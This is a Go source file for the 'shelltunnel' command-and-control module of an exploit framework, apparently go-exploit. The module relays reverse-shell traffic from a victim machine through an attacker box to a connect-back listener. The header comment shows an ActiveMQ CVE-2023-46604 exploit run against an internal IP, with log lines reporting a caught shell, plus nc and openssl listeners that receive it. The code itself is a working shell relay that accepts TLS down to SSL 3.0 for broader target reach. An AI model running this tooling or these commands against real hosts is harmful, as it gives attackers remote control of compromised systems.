// shelltunnel is a simple C2 that copies shell traffic between a reverse shell origin and
// a connectback server. It essentially allows for this setup:
//
// | Box 1 |                       |     Box 2    |                      |    Box 3     |
// | nc -l | <- shell traffic ->   | shell tunnel | <- shell traffic ->  | shell origin |
//
// Where 'nc -l' is basically any C&C you want that accepts reverse shells, box 2 is the attacker
// box, and box 3 is the victim. In this example, go-exploit on box 2 (attacker box) can act as
// an egress for the reverse shell generated on the victim (box 3). The shell tunnel will just
// copy the traffic data between the two boxes (1 & 3). This is appealing over something like a socks5
// proxy or more advanced tunneling because it simply works and requires, for the exploit dev,
// no extra work beyond generating the initial shell (via *ShellServer or a binary or whatever).
//
// Usage example using an unencrypted reverse shell:
//
//	albinolobster@mournland:~/initial-access/feed/cve-2023-46604$ ./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12
//	time=2024-10-28T15:05:21.600-04:00 level=STATUS msg="Starting listener on 10.9.49.192:1270"
//	time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.56 port=61616 ssl=false "ssl auto"=false
//	time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.192:1270"
//	time=2024-10-28T15:05:21.601-04:00 level=STATUS msg="HTTP server listening for 10.9.49.192:8080/TMURWfRGRdSZ"
//	time=2024-10-28T15:05:23.603-04:00 level=STATUS msg=Connecting...
//	time=2024-10-28T15:05:23.630-04:00 level=STATUS msg="Sending exploit"
//	time=2024-10-28T15:05:23.656-04:00 level=STATUS msg="Sending payload"
//	time=2024-10-28T15:05:23.675-04:00 level=STATUS msg="Sending payload"
//	time=2024-10-28T15:05:23.757-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.56:48440"
//	time=2024-10-28T15:05:23.758-04:00 level=SUCCESS msg="Connect back to 10.9.49.12:1270 success!"
//	time=2024-10-28T15:05:28.633-04:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
//
// Above, you can see we've exploited a remote ActiveMQ (10.9.49.56), caught a reverse shell, and connected it back to a listener
// at 10.9.49.12:1270. The shell there looks like this:
//
//	parallels@ubuntu-linux-22-04-02-desktop:~$ nc -lvnp 1270
//	Listening on 0.0.0.0 1270
//	Connection received on 10.9.49.192 51478
//	pwd
//	/opt/apache-activemq-5.15.2
//
// The tunnel can also support catching and relaying TLS (or a mix of either). For example, the above can be updated like so:
//
//	./build/cve-2023-46604_linux-arm64 -e -rhost 10.9.49.56 -lhost 10.9.49.192 -lport 1270 -httpAddr 10.9.49.192 -c2 ShellTunnel -shellTunnel.cbHost 10.9.49.12 -shellTunnel.cbSSL -shellTunnel.sslListen
//
// And the reverse shell can now be caught by openssl:
//
//	parallels@ubuntu-linux-22-04-02-desktop:~$ openssl s_server -quiet -key key.pem -cert cert.pem -port 1270
//	pwd
//	/opt/apache-activemq-5.15.2
package shelltunnel

import (
	"crypto/tls"
	"errors"
	"flag"
	"fmt"
	"io"
	"net"
	"strconv"
	"strings"
	"sync/atomic"
	"time"

	"github.com/vulncheck-oss/go-exploit/c2/channel"
	"github.com/vulncheck-oss/go-exploit/encryption"
	"github.com/vulncheck-oss/go-exploit/output"
	"github.com/vulncheck-oss/go-exploit/protocol"
)

type Server struct {
	// the TCP listener that will accept all the connections
	Listener net.Listener

	// the server address/hostname to tunnel the data to
	ConnectBackHost string

	// the server port to tunnel the data to
	ConnectBackPort int

	// indicates if we should use an encrypted tunnel to the server
	ConnectBackSSL bool

	// indicates if we should be listening as an SSL server
	SSLShellServer bool

	// The file path to the user provided private key (if provided)
	PrivateKeyFile string

	// The file path to the user provided certificate (if provided)
	CertificateFile string

	// Underlying C2 channel with metadata and session tracking
	channel *channel.Channel
}

var (
	serverSingleton *Server

	ErrTLSListener = errors.New("tls listener init")
)

func GetInstance() *Server {
	if serverSingleton == nil {
		serverSingleton = new(Server)
	}

	return serverSingleton
}

func (shellTunnel *Server) CreateFlags() {
	flag.StringVar(&shellTunnel.ConnectBackHost, "shellTunnel.cbHost", "", "The server to tunnel the data back to")
	flag.IntVar(&shellTunnel.ConnectBackPort, "shellTunnel.cbPort", 1270, "The server port to tunnel the data back to")
	flag.BoolVar(&shellTunnel.ConnectBackSSL, "shellTunnel.cbSSL", false, "Indicates if the connect-back should use SSL/TLS")

	// optional for when SSL server is enabled
	flag.BoolVar(&shellTunnel.SSLShellServer, "shellTunnel.sslListen", false, "Indicates if we should listen as an SSL/TLS server")
	flag.StringVar(&shellTunnel.PrivateKeyFile, "shellTunnel.PrivateKeyFile", "", "A private key to use when being an SSL server")
	flag.StringVar(&shellTunnel.CertificateFile, "shellTunnel.CertificateFile", "", "The certificate to use when being an SSL server")
}

func (shellTunnel *Server) Init(channel *channel.Channel) bool {
	if channel.Shutdown == nil {
		// Initialize the shutdown atomic. This lets us not have to define it if the C2 is manually
		// configured.
		var shutdown atomic.Bool
		shutdown.Store(false)
		channel.Shutdown = &shutdown
	}
	shellTunnel.channel = channel
	if channel.IsClient {
		output.PrintFrameworkError("Called ShellTunnel as a client. Use lhost and lport.")

		return false
	}
	if shellTunnel.ConnectBackHost == "" {
		output.PrintFrameworkError("Failed to provide a connect back host")

		return false
	}
	if shellTunnel.ConnectBackPort == 0 {
		output.PrintFrameworkError("Failed to provide a connect back port")

		return false
	}

	output.PrintfFrameworkStatus("Starting listener on %s:%d", channel.IPAddr, channel.Port)

	var err error
	if shellTunnel.SSLShellServer {
		shellTunnel.Listener, err = shellTunnel.createTLSListener(channel)
	} else {
		shellTunnel.Listener, err = net.Listen("tcp", channel.IPAddr+":"+strconv.Itoa(channel.Port))
	}

	if err != nil {
		output.PrintFrameworkError("Couldn't create the server: " + err.Error())

		return false
	}

	return true
}

func (shellTunnel *Server) Shutdown() bool {
	// Account for non-running case
	if shellTunnel.Channel() == nil {
		return true
	}
	output.PrintFrameworkStatus("C2 received shutdown, killing server and client sockets for shell tunnel")
	if len(shellTunnel.Channel().Sessions) > 0 {
		for k, session := range shellTunnel.Channel().Sessions {
			output.PrintfFrameworkStatus("Connection closed: %s", session.RemoteAddr)
			shellTunnel.Channel().RemoveSession(k)
		}
	}
	shellTunnel.Listener.Close()

	return true
}

func (shellTunnel *Server) Channel() *channel.Channel {
	return shellTunnel.channel
}

func (shellTunnel *Server) Run(timeout int) {
	// terminate the server if no shells come in within timeout seconds
	go func() {
		time.Sleep(time.Duration(timeout) * time.Second)
		if !shellTunnel.Channel().HasSessions() {
			output.PrintFrameworkError("Timeout met. Shutting down shell listener.")
			shellTunnel.Channel().Shutdown.Store(true)
		}
	}()
	go func() {
		for {
			if shellTunnel.Channel().Shutdown.Load() {
				shellTunnel.Shutdown()

				break
			}
			time.Sleep(10 * time.Millisecond)
		}
	}()

	// Accept arbitrary connections. In the future we need something for the
	// user to select which connection to make active
	for {
		client, err := shellTunnel.Listener.Accept()
		if err != nil {
			if !strings.Contains(err.Error(), "use of closed network connection") {
				output.PrintFrameworkError(err.Error())
			}

			return
		}
		if shellTunnel.Channel().Shutdown.Load() {
			break
		}
		output.PrintfFrameworkSuccess("Caught new shell from %v", client.RemoteAddr())
		// ShellTunnel is a bit of an outliar as we need to track the incoming connections and also the
		// tunneled connections. This will allow for cleanup of connections on both ends of the pipe,
		// but may not be immediately clear.
		shellTunnel.Channel().AddSession(&client, client.RemoteAddr().String())
		go handleTunnelConn(client, shellTunnel.ConnectBackHost, shellTunnel.ConnectBackPort, shellTunnel.ConnectBackSSL, shellTunnel.channel)
		time.Sleep(10 * time.Millisecond)
	}
}

func (shellTunnel *Server) createTLSListener(channel *channel.Channel) (net.Listener, error) {
	var ok bool
	var err error
	var certificate tls.Certificate
	if len(shellTunnel.CertificateFile) != 0 && len(shellTunnel.PrivateKeyFile) != 0 {
		certificate, err = tls.LoadX509KeyPair(shellTunnel.CertificateFile, shellTunnel.PrivateKeyFile)
		if err != nil {
			return nil, fmt.Errorf("%s %w", err.Error(), ErrTLSListener)
		}
	} else {
		output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
		certificate, ok = encryption.GenerateCertificate()
		if !ok {
			return nil, fmt.Errorf("GenerateCertificate failed %w", ErrTLSListener)
		}
	}

	output.PrintfFrameworkStatus("Starting TLS listener on %s:%d", channel.IPAddr, channel.Port)
	listener, err := tls.Listen(
		"tcp", fmt.Sprintf("%s:%d", channel.IPAddr, channel.Port), &tls.Config{
			Certificates: []tls.Certificate{certificate},
			// We have no control over the SSL versions supported on the remote target. Be permissive for more targets.
			MinVersion: tls.VersionSSL30,
		})
	if err != nil {
		return nil, fmt.Errorf("%s %w", err.Error(), ErrTLSListener)
	}

	return listener, nil
}

func handleTunnelConn(clientConn net.Conn, host string, port int, ssl bool, ch *channel.Channel) {
	defer clientConn.Close()

	// attempt to connect back to the serve. MixedConnect is both proxy aware and can
	// produce an ssl or unencrypted connection so works pretty nice here
	serverConn, ok := protocol.MixedConnect(host, port, ssl)
	if !ok {
		// This is a bit of a hack as the type of C2 callbacks is not tracked and we will have 1
		// in the sessions from the client call. This checks if it's 1 or less and if it is then it
		// will drop future conns.
		if len(ch.Sessions) <= 1 {
			output.PrintfFrameworkError("Failed to connect back to %s:%d closing server", host, port)
			ch.Shutdown.Store(true)

			return
		}
		output.PrintfFrameworkError("Failed to connect back to %s:%d", host, port)

		return
	}
	ch.AddSession(&serverConn, serverConn.RemoteAddr().String())
	output.PrintfFrameworkSuccess("Connect back to %s:%d success!", host, port)

	defer serverConn.Close()

	done := make(chan struct{})

	// copy between the two endpoints until one dies
	go func() {
		_, _ = io.Copy(serverConn, clientConn)
		done <- struct{}{}
	}()

	go func() {
		_, _ = io.Copy(clientConn, serverConn)
		done <- struct{}{}
	}()

	<-done
	// Trigger shutdown after the first connection is dropped. in a future where multiple are handled
	// this might not be ideal. Revist this when that time comes.
	ch.Shutdown.Store(true)
}
